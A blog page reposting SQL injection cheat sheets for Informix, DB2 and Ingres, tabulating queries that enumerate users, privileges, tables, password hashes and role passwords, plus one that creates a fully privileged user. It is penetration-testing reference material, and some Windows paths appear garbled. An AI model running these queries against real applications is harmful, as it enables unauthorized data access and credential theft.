Informix SQL Injection Cheat Sheet

Hacking 2011. 11. 8. 11:30

Some useful syntax reminders for SQL Injection into Informix databases…

Below are some tabulated notes on how to do many of thing you’d normally do via SQL injection. All tests were performed on Informix Dynamic Server Express Edition 11.5 for Windows. The Informix download page is here.

This post is part of series of SQL Injection Cheat Sheets. In this series, I’ve endevoured to tabulate the data to make it easier to read and to use the same table for for each database backend. This helps to highlight any features which are lacking for each database, and enumeration techniques that don’t apply and also areas that I haven’t got round to researching yet.

The complete list of SQL Injection Cheat Sheets I’m working is:

I’m not planning to write one for MS Access, but there’s a great MS Access Cheat Sheet here.

Version SELECT DBINFO(‘version’, ‘full’) FROM systables WHERE tabid = 1;
SELECT DBINFO(‘version’, ‘server-type’) FROM systables WHERE tabid = 1;
SELECT DBINFO(‘version’, ‘major’), DBINFO(‘version’, ‘minor’), DBINFO(‘version’, ‘level’) FROM systables WHERE tabid = 1;
SELECT DBINFO(‘version’, ‘os’) FROM systables WHERE tabid = 1; — T=Windows, U=32 bit app on 32-bit Unix, H=32-bit app running on 64-bit Unix, F=64-bit app running on 64-bit unix
Comments select 1 FROM systables WHERE tabid = 1; — comment
Current User SELECT USER FROM systables WHERE tabid = 1;
select CURRENT_ROLE FROM systables WHERE tabid = 1;
List Users select username, usertype, password from sysusers;
List Password Hashes TODO
List Privileges select tabname, grantor, grantee, tabauth FROM systabauth join systables on systables.tabid = systabauth.tabid; — which tables are accessible by which users
select procname, owner, grantor, grantee from sysprocauth join sysprocedures on sysprocauth.procid = sysprocedures.procid; — which procedures are accessible by which users
List DBA Accounts TODO
Current Database SELECT DBSERVERNAME FROM systables where tabid = 1; — server name
List Databases select name, owner from sysdatabases;
List Columns select tabname, colname, owner, coltype FROM syscolumns join systables on syscolumns.tabid = systables.tabid;
List Tables select tabname, owner FROM systables;
select tabname, viewtext FROM sysviews join systables on systables.tabid = sysviews.tabid;
List Stored Procedures select procname, owner FROM sysprocedures;
Find Tables From Column Name select tabname, colname, owner, coltype FROM syscolumns join systables on syscolumns.tabid = systables.tabid where colname like ‘%pass%’;
Select Nth Row select first 1 tabid from (select first 10 tabid from systables order by tabid) as sq order by tabid desc; — selects the 10th row
Select Nth Char SELECT SUBSTRING(‘ABCD’ FROM 3 FOR 1) FROM systables where tabid = 1; — returns ‘C’
Bitwise AND select bitand(6, 1) from systables where tabid = 1; — returns 0
select bitand(6, 2) from systables where tabid = 1; — returns 2
ASCII Value -> Char TODO
Char -> ASCII Value select ascii(‘A’) from systables where tabid = 1;
Casting select cast(’123′ as integer) from systables where tabid = 1;
select cast(1 as char) from systables where tabid = 1;
String Concatenation SELECT ‘A’ || ‘B’ FROM systables where tabid = 1; — returns ‘AB’
SELECT concat(‘A’, ‘B’) FROM systables where tabid = 1; — returns ‘AB’
String Length SELECT tabname, length(tabname), char_length(tabname), octet_length(tabname) from systables;
If Statement TODO
Case Statement select tabid, case when tabid>10 then “High” else ‘Low’ end from systables;
Avoiding Quotes TODO
Time Delay TODO
Make DNS Requests TODO
Command Execution TODO
Local File Access TODO
Hostname, IP Address SELECT DBINFO(‘dbhostname’) FROM systables WHERE tabid = 1; — hostname
Location of DB files TODO
Default/System Databases These are the system databases:
sysmaster
sysadmin*
sysuser*
sysutils*

* = don’t seem to contain anything / don’t allow readingInstalling Locally

You can download Informix Dynamic Server Express Edition 11.5 Trial for Linux and Windows.

Database ClientThere’s a database client SDK available, but I couldn’t get the demo client working.
I used SQuirreL SQL Client Version 2.6.8 after installing the Informix JDBC drivers (“emerge dev-java/jdbc-informix” on Gentoo).Logging in from command line

If you get local admin rights on a Windows box and have a GUI logon:

  • Click: Start | All Programs | IBM Informix Dynamic Server 11.50 | someservername. This will give you a command prompt with various Environment variables set properly.
  • Run dbaccess.exe from your command prompt. This will bring up a text-based GUI that allows you to browse databases.

The following were set on my test system. This may help if you get command line access, but can’t get a GUI – you’ll need to change “testservername”:

set INFORMIXDIR=C:PROGRA~1IBMIBMINF~111.50
set INFORMIXSERVER=testservername
set ONCONFIG=ONCONFIG.testservername
set PATH=C:PROGRA~1IBMIBMINF~111.50bin;C:WINDOWSsystem32;C:WINDOWS;C:WINDOWSSystem32Wbem;C:PROGRA~1ibmgsk7bin;C:PROGRA~1ibmgsk7lib;C:Program FilesIBMInformixClien-SDKbin;C:Program Filesibmgsk7bin;C:Program Filesibmgsk7lib
set CLASSPATH=C:PROGRA~1IBMIBMINF~111.50extendkrakatoakrakatoa.jar;C:PROGRA~1IBMIBMINF~111.50xtendkrakatoajdbc.jar;
set DBTEMP=C:PROGRA~1IBMIBMINF~111.50infxtmp
set CLIENT_LOCALE=EN_US.CP1252
set DB_LOCALE=EN_US.8859-1
set SERVER_LOCALE=EN_US.CP1252
set DBLANG=EN_US.CP1252
mode con codepage select=1252
Identifying on the network

My default installation listened on two TCP ports: 9088 and 9099. When I created a new “server name”, this listened on 1526/TCP by default. Nmap 4.76 didn’t identify these ports as Informix:

$ sudo nmap -sS -sV 10.0.0.1 -p- -v –version-all

1526/tcp open pdap-np?
9088/tcp open unknown
9089/tcp open unknown

TODO How would we identify Informix listening on the network?

'Hacking' 카테고리의 다른 글

Blocked DOMAINS / IP address for spreading malicous files (Chat.EXE, Chat.DLL)  (0) 2011.11.30
Virus Pattern (Trend Micro)  (0) 2011.11.29
DB2 SQL Injection Cheat Sheet  (0) 2011.11.08
Ingres SQL Injection Cheat Sheet  (1) 2011.11.08
Postgres SQL Injection Cheat Sheet  (0) 2011.11.08
Posted by CEOinIRVINE
l

DB2 SQL Injection Cheat Sheet

Hacking 2011. 11. 8. 11:29

Finding a SQL injection vulnerability in a web application backed by DB2 isn’t too common in my experience. When you do find one, though it pays to be prepared…

Below are some tabulated notes on how to do many of thing you’d normally do via SQL injection. All tests were performed on DB2 8.2 under Windows.

This post is part of series of SQL Injection Cheat Sheets. In this series, I’ve endevoured to tabulate the data to make it easier to read and to use the same table for for each database backend. This helps to highlight any features which are lacking for each database, and enumeration techniques that don’t apply and also areas that I haven’t got round to researching yet.

The complete list of SQL Injection Cheat Sheets I’m working is:

I’m not planning to write one for MS Access, but there’s a great MS Access Cheat Sheet here.

Some of the queries in the table below can only be run by an admin. These are marked with “– priv” at the end of the query.

Version select versionnumber, version_timestamp from sysibm.sysversions;
Comments select blah from foo; — comment like this
Current User select user from sysibm.sysdummy1;
select session_user from sysibm.sysdummy1;
select system_user from sysibm.sysdummy1;
List Users N/A (I think DB2 uses OS-level user accounts for authentication.)

Database authorities (like roles, I think) can be listed like this:
select grantee from syscat.dbauth;

List Password Hashes N/A (I think DB2 uses OS-level user accounts for authentication.)
List Privileges select * from syscat.tabauth; — privs on tables
select * from syscat.dbauth where grantee = current user;
select * from syscat.tabauth where grantee = current user;
List DBA Accounts TODO
Current Database select current server from sysibm.sysdummy1;
List Databases SELECT schemaname FROM syscat.schemata;
List Columns select name, tbname, coltype from sysibm.syscolumns;
List Tables select name from sysibm.systables;
Find Tables From Column Name TODO
Select Nth Row select name from (SELECT name FROM sysibm.systables order by
name fetch first N+M-1 rows only) sq order by name desc fetch first N rows only;
Select Nth Char SELECT SUBSTR(‘abc’,2,1) FROM sysibm.sysdummy1; — returns b
Bitwise AND This page seems to indicate that DB2 has no support for bitwise operators!
ASCII Value -> Char select chr(65) from sysibm.sysdummy1; — returns ‘A’
Char -> ASCII Value select ascii(‘A’) from sysibm.sysdummy1; — returns 65
Casting SELECT cast(’123′ as integer) FROM sysibm.sysdummy1;
SELECT cast(1 as char) FROM sysibm.sysdummy1;
String Concatenation SELECT ‘a’ concat ‘b’ concat ‘c’ FROM sysibm.sysdummy1; — returns ‘abc’
select ‘a’ || ‘b’ from sysibm.sysdummy1; — returns ‘ab’
If Statement TODO
Case Statement TODO
Avoiding Quotes TODO
Time Delay ???See Heavy Queries article for some ideas.
Make DNS Requests TODO
Command Execution TODO
Local File Access TODO
Hostname, IP Address TODO
Location of DB files TODO
Default/System Databases TODO

'Hacking' 카테고리의 다른 글

Virus Pattern (Trend Micro)  (0) 2011.11.29
Informix SQL Injection Cheat Sheet  (0) 2011.11.08
Ingres SQL Injection Cheat Sheet  (1) 2011.11.08
Postgres SQL Injection Cheat Sheet  (0) 2011.11.08
MySQL SQL Injection Cheat Sheet  (1) 2011.11.08
Posted by CEOinIRVINE
l

Ingres SQL Injection Cheat Sheet

Hacking 2011. 11. 8. 11:29

gres seems to be one of the less common database backends for web applications, so I thought it would be worth installing it and making some notes to make my next Ingres-based web app test a little easier.

Below are some tabulated notes on how to do many of thing you’d normally do via SQL injection. All tests were performed on Ingres 9.2.0 alpha Build 108 for Linux. The Ingres download page is here.

This page will probably remain a work-in-progress for some time yet. I’ll update it as I learn more.

This post is part of series of SQL Injection Cheat Sheets. In this series, I’ve endevoured to tabulate the data to make it easier to read and to use the same table for for each database backend. This helps to highlight any features which are lacking for each database, and enumeration techniques that don’t apply and also areas that I haven’t got round to researching yet.

The complete list of SQL Injection Cheat Sheets I’m working is:

I’m not planning to write one for MS Access, but there’s a great MS Access Cheat Sheet here.

Version select dbmsinfo(‘_version’);
Comments SELECT 123; — comment
select 123; /* comment */
Current User select dbmsinfo(‘session_user’);
select dbmsinfo(‘system_user’);
List Users First connect to iidbdb, then:
select name, password from iiuser;
Create Users create user testuser with password = ‘testuser’;– priv
List Password Hashes First connect to iidbdb, then:
select name, password from iiuser;
List Privileges select dbmsinfo(‘db_admin’);
select dbmsinfo(‘create_table’);
select dbmsinfo(‘create_procedure’);
select dbmsinfo(‘security_priv’);
select dbmsinfo(‘select_syscat’);
select dbmsinfo(‘db_privileges’);
select dbmsinfo(‘current_priv_mask’);
List DBA Accounts TODO
Current Database select dbmsinfo(‘database’);
List Databases TODO
List Columns select column_name, column_datatype, table_name, table_owner from iicolumns;
List Tables select table_name, table_owner from iitables;
select relid, relowner, relloc from iirelation;
select relid, relowner, relloc from iirelation where relowner != ‘$ingres’;
Find Tables From Column Name TODO
Select Nth Row Astoundingly, this doesn’t seem to be possible! This is as close as you can get:

select top 10 blah from table;
select first 10 blah form table;

Select Nth Char select substr(‘abc’, 2, 1); — returns ‘b’
Bitwise AND The function “bit_and” exists, but seems hard to use. Here’s an
example of ANDing 3 and 5 together. The result is a “byte” type
with value ?01:

select substr(bit_and(cast(3 as byte), cast(5 as byte)),1,1);

ASCII Value -> Char TODO
Char -> ASCII Value TODO
(The “ascii” function exists, but doesn’t seem to do what I’d expect.)
Casting select cast(123 as varchar);
select cast(’123′ as integer);
String Concatenation select ‘abc’ || ‘def’;
If Statement TODO
Case Statement TODO
Avoiding Quotes TODO
Time Delay ???

See Heavy Queries article for some ideas.

Make DNS Requests TODO
Command Execution TODO
Local File Access TODO
Hostname, IP Address TODO
Location of DB files TODO
Default/System Databases TODO
Installing Locally The Ingres database can be downloaded for free from http://esd.ingres.com/
A pre-built Linux-based Ingres Database Server can be download from http://www.vmware.com/appliances/directory/832
Database Client TODO
There is a client called “sql” which can be used for local connections (at least) in the database server package above.
Logging in from command line $ su - ingres
$ sql iidbdb
* select dbmsinfo(‘_version’); go
Identifying on the network TODO

The following areas are interesting enough to include on this page, but I haven’t researched them for other databases:

Description SQL / Comments
Batching Queries Allowed? Not via DBI in PERL. Subsequent statements seem to get ignored:
select blah from table where foo = 1; select … doesn’t matter this is ignored.
FROM clause mandated in SELECTs? No. You don’t need to select form “dual” or anything. The following is legal:
select 1;
UNION supported Yes. Nothing tricky here. The following is legal:
select 1 union select 2;
Enumerate Tables Privs select table_name, permit_user, permit_type from iiaccess;
Length of a string select length(‘abc’); — returns 3
Roles and passwords First you need to connect to iidbdb, then:
select roleid, rolepass from iirole;
List Database Procedures First you need to connect to iidbdb, then:
select dbp_name, dbp_owner from iiprocedure;
Create Users + Granting Privs First you need to connect to iidbdb, then:
create user pm with password = ‘password’;
grant all on current installation to pm;

Tags: , , , ,

Posted in SQL Injection


'Hacking' 카테고리의 다른 글

Informix SQL Injection Cheat Sheet  (0) 2011.11.08
DB2 SQL Injection Cheat Sheet  (0) 2011.11.08
Postgres SQL Injection Cheat Sheet  (0) 2011.11.08
MySQL SQL Injection Cheat Sheet  (1) 2011.11.08
MSSQL Injection Cheat Sheet  (0) 2011.11.08
Posted by CEOinIRVINE
l
◀ 이전페이지 1 ··· 20 21 22 23 24 25 26 ··· 761 다음페이지 ▶
블로그 이미지
Information Security & US & Life & Love & Fashion & Hacking & Passion hack, web security, game security, game hack, fps, ava, wow, starcraft II, soldier front, gunz, reverse engineering, SQL injection, XSS, hacking, penetration testings, IT, internet technlogoy, security, penetratoin testing, XSS, XSRF CEOinIRVINE

최근에 올라온 글

공지사항

카테고리

CEOinIRVINE (2282)
Editorials (4)
Finance & EMBA (1)
Fashion (239)
IT (215)
Hacking (266)
Online Game (17)
Vocabulary (14)
iLoveBlackberry (2)
Business (1108)
Politics (165)
US News (115)
World News (63)
Career Consulting (8)
Apple (5)
Car (13)
Travel (5)
Irvine (3)
Sports (3)
recipe (1)
Music (15)
TVs (11)
Spanish (1)
Cyber Law (1)
Perl (3)
Java (1)
Stock (1)
Artificial Intelligence (1)

태그목록

달력

«   2025/08   »
1 2
3 4 5 6 7 8 9
10 11 12 13 14 15 16
17 18 19 20 21 22 23
24 25 26 27 28 29 30
31

링크

  • Total :
  • Today :
  • Yesterday :
tistory 티스토리 가입하기!
rss

최근에 달린 댓글

최근에 받은 트랙백

글 보관함

티스토리툴바